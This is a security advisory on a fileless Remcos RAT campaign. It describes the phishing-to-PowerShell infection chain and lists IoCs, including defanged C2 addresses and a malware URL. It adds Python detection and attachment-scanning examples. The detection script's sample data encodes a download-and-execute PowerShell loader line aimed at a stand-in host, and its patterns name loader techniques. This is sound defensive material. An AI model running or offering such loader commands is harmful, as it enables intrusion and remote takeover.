Remcos RAT Uses Fileless PowerShell Attacks to Evade Detection

A new Remcos RAT campaign is using fileless PowerShell techniques to bypass security defenses and gain persistent remote access to infected systems


Introduction

A malware campaign involving Remcos (Remote Control and Surveillance) RAT has recently been identified, and it illustrates how routinely cybercriminals now rely on fileless techniques. Because the loader and the payload run only in memory, file-scanning antivirus has little to inspect, while a registry autostart entry keeps the attacker's access across reboots.

Originally developed as a legitimate remote administration tool, Remcos has since become widely abused by cybercriminals and Advanced Persistent Threat (APT) groups for espionage, credential theft, and system takeover.


What Is Remcos RAT?

Remcos (Remote Control and Surveillance) is a Remote Access Trojan (RAT) created by Breaking Security. While initially promoted for lawful remote system management, it has been extensively misused for malicious activities such as:

  • Remote command execution

  • Credential and data theft

  • User activity monitoring

  • Persistent system access


Infection Mechanism

In the latest observed campaign, attackers rely on an execution chain that is fileless from the script stage onward: the ZIP archive and the shortcut do reach disk, but the VBScript, the PowerShell loader and the Remcos payload itself are fetched and executed in memory only.

Infection Chain

  1. Phishing emails deliver ZIP archives

  2. The ZIP contains a deceptive .lnk shortcut file

  3. Opening the shortcut launches mshta.exe

  4. mshta.exe executes a remote, obfuscated VBScript

  5. The script downloads a PowerShell-based shellcode loader

  6. The loader executes entirely in memory

  7. Remcos RAT is injected into svchost.exe via process hollowing

To survive reboots, the malware adds an autostart value under the per-user Run key, which requires no administrative rights to write:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
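As an added example (not code from the article or from the campaign's reporting), the following Python sketch hunts for the chain above in Sysmon-style process-creation and registry events. The events, paths, SID, hostnames and encoded payload are constructed, and the rule names, regexes and trusted-writer list are assumptions to tune for a real estate.

```python
"""Hunt for the mshta -> PowerShell -> in-memory loader chain and the
HKCU Run-key persistence described above, over Sysmon-style telemetry.

Added example, not code from the article or from any vendor report. The
records below are constructed to mimic Sysmon Event ID 1 (ProcessCreate)
and Event ID 13 (RegistryEvent, value set); hostnames, SIDs, paths and the
encoded payload are invented.
"""
import base64
import re

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Processes allowed to write Run values on this (hypothetical) build; tune per estate.
TRUSTED_RUN_WRITERS = {"msiexec.exe", "explorer.exe"}

# Sysmon logs HKCU as HKU\<SID>\..., so match the tail of the key path.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)

# Command-line traits of a download-and-execute or shellcode loader.
LOADER_PATTERNS = {
    "encoded_command": re.compile(r"\s-e(ncodedcommand|nc|c)?\s", re.I),
    "hidden_window": re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "memory_api": re.compile(r"virtualalloc|writeprocessmemory|createremotethread|setthreadcontext", re.I),
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd):
    """Return the script hidden behind -enc/-e (base64 of UTF-16LE), or None."""
    m = re.search(r"\s-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_process(ev):
    """Rules for one ProcessCreate event; returns the rule names that fired."""
    hits = []
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    if image in SCRIPT_HOSTS and re.search(r"https?://", cmd, re.I):
        hits.append("script_host_remote_content")      # steps 3-4: mshta pulling a remote script
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        hits.append("powershell_from_script_host")     # step 5: script host spawning PowerShell
    if image in POWERSHELL:
        # Scan the decoded script too, otherwise -enc hides IEX/DownloadString.
        text = cmd + " " + (decode_encoded_command(cmd) or "")
        hits += ["loader:" + name for name, pat in LOADER_PATTERNS.items() if pat.search(text)]
    return hits


def classify_registry(ev):
    """Rule for one RegistryEvent: an untrusted process writing a Run value."""
    if RUN_KEY.search(ev["TargetObject"]) and basename(ev["Image"]) not in TRUSTED_RUN_WRITERS:
        return ["run_key_persistence"]
    return []


def hunt(events):
    """Map the index of each suspicious event to the rules it triggered."""
    findings = {}
    for i, ev in enumerate(events):
        if ev["EventID"] == 1:
            hits = classify_process(ev)
        elif ev["EventID"] == 13:
            hits = classify_registry(ev)
        else:
            hits = []
        if hits:
            findings[i] = hits
    return findings


# --- constructed sample telemetry ---------------------------------------
HKCU = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/loader.ps1')"
ENC = base64.b64encode(STAGE2.encode("utf-16le")).decode()

EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://cdn.example.invalid/invoice.hta"},          # .lnk launched mshta
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -NoP -w hidden -enc " + ENC},                  # in-memory loader
    {"EventID": 13, "Image": PS, "Details": r"C:\Users\alice\AppData\Roaming\svc.lnk",
     "TargetObject": HKCU + r"\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdateSvc"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},            # benign admin script
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe", "Details": "DWORD (0x00000001)",
     "TargetObject": HKCU + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
]

if __name__ == "__main__":
    for i, hits in hunt(EVENTS).items():
        print(i, basename(EVENTS[i]["Image"]), hits)
```

The parent-child rule (a script host spawning PowerShell) fires without any content inspection, which is why it is the most robust of the three. Matching only the raw command line would see just `-w hidden` and `-enc`; decoding the UTF-16LE base64 is what exposes the IEX and DownloadString stage, and it is the same visibility that PowerShell script block logging gives you once the loader actually runs.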

Post-Infection Behavior

Once deployed, Remcos RAT performs several malicious activities:

  • Injects itself into legitimate system processes

  • Collects operating system and software information

  • Monitors file contents and user activity

  • Establishes TLS-encrypted communication with its command-and-control (C2) server

  • Maintains persistence through registry-based autostart entries


Why This Attack Is Dangerous

  • Fileless execution leaves minimal forensic evidence

  • Abuse of trusted Windows utilities helps evade detection

  • Traditional antivirus solutions often fail to detect memory-based attacks

  • Enables long-term surveillance and full system compromise


Indicators of Compromise (IoCs)

File Hashes (hosted list)

https://pastebin.com/KwL8FbAd

Domain

readysteaurants[.]com

URL (hosted PowerShell script)

hxxps://0x0[.]st/8KuV.ps1

IP Addresses

193[.]142[.]146[.]101

162[.]254[.]39[.]129

107[.]173[.]4[.]16:2404

Security Recommendations

  • Do not open unsolicited email attachments

  • Block .lnk, .hta, .js, .vbs, and executable attachments

  • Restrict PowerShell and Windows Script Host (wscript.exe, cscript.exe) usage, and block or constrain mshta.exe where it is not needed, since it is the pivot in this chain

  • Enable PowerShell script block and module logging, and forward the logs to centralized monitoring

  • Keep operating systems and applications updated

  • Disable RDP if not required

  • Maintain regular offline backups

  • Implement application whitelisting and network segmentation
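To make the attachment-blocking recommendation concrete, here is an added Python example (not from the article) of a gateway-style check that unpacks a ZIP in memory and flags the .lnk, .hta, script and executable members the article advises blocking, including double extensions, renamed archives and nested ZIPs. The sample attachments are constructed in the code with zipfile; the extension list and the nesting limit are assumptions.

```python
"""Gateway-style attachment check for the delivery vector described above:
a ZIP that carries a .lnk (or another script/executable) inside.

Added example, not from the article. Sample attachments are built in memory
with zipfile, so every archive and filename here is constructed; the
blocked-extension list and nesting limit are assumptions to tune locally.
"""
import io
import zipfile
from pathlib import PureWindowsPath

BLOCKED_EXTENSIONS = {
    ".lnk", ".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh",
    ".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".ps1", ".msi", ".dll",
}
MAX_DEPTH = 2   # nested archives beyond this are refused rather than unpacked


def extension(name):
    # PureWindowsPath accepts both separators; lower-case catches "Invoice.LNK".
    return PureWindowsPath(name).suffix.lower()


def scan_attachment(filename, data, depth=0):
    """Return (reason, path) findings for one attachment, recursing into ZIPs."""
    findings = []
    if extension(filename) in BLOCKED_EXTENSIONS:
        findings.append(("blocked_extension", filename))
    # Check the magic bytes too: a renamed ZIP still opens on the client.
    if extension(filename) == ".zip" or data[:4] == b"PK\x03\x04":
        if depth >= MAX_DEPTH:
            findings.append(("archive_too_deep", filename))
            return findings
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if info.is_dir():
                        continue
                    member = filename + "!" + info.filename
                    if info.flag_bits & 0x1:
                        # Encrypted member: cannot inspect, so do not trust it.
                        findings.append(("encrypted_member", member))
                        continue
                    findings += scan_attachment(member, zf.read(info), depth + 1)
        except zipfile.BadZipFile:
            findings.append(("corrupt_archive", filename))
    return findings


def scan_all(attachments):
    """Map attachment name -> findings for every attachment that raised one."""
    return {name: hits for name, data in attachments.items()
            if (hits := scan_attachment(name, data))}


def build_zip(members):
    """Constructed test data: members is {name: bytes}; returns ZIP bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed attachments; the .lnk body is a placeholder, not a real shortcut.
SAMPLES = {
    "Invoice_4471.zip": build_zip({"Invoice_4471.pdf.lnk": b"L\x00\x00\x00" + b"\x00" * 72}),
    "photos.zip": build_zip({"holiday/IMG_001.jpg": b"\xff\xd8\xff\xe0", "holiday/notes.txt": b"ok"}),
    "report.zip": build_zip({"inner.zip": build_zip({"Report.hta": b"<hta:application />"})}),
    "deep.zip": build_zip({"d.zip": build_zip({"e.zip": build_zip({"f.txt": b"x"})})}),
    "update.vbs": b'MsgBox "hello"',
}

if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        print(name, hits)
```

Two edge cases are deliberate: the magic-byte check catches a ZIP renamed to an innocuous extension, and the depth limit plus the encrypted-member rule mean anything the gateway cannot fully inspect is reported rather than silently passed through.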


Conclusion

The latest Remcos RAT campaign highlights how attackers are increasingly relying on fileless PowerShell techniques to bypass traditional defenses. Organizations must adopt a layered security approach, combining endpoint protection, user awareness, and advanced logging to effectively defend against such evolving threats.